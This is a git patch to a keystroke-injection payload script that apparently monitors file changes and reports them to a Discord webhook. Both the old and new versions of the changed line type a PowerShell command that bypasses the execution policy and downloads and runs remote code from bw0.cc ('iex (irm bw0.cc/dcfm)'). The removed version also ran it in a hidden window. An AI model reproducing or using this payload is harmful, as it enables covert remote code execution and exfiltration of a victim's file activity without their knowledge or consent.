From 7107cbd44b5474082c963328fa40c86eea256a82 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 10:55:09 +0000 Subject: [PATCH] Update File-Changes-to-Discord.txt --- File-Monitor-to-Discord/File-Changes-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/File-Monitor-to-Discord/File-Changes-to-Discord.txt b/File-Monitor-to-Discord/File-Changes-to-Discord.txt index 467b4bc..285982e 100644 --- a/File-Monitor-to-Discord/File-Changes-to-Discord.txt +++ b/File-Monitor-to-Discord/File-Changes-to-Discord.txt @@ -15,7 +15,7 @@ REM open powershell (remove -W Hidden to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dcfm) +STRING powershell -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dcfm) ENTER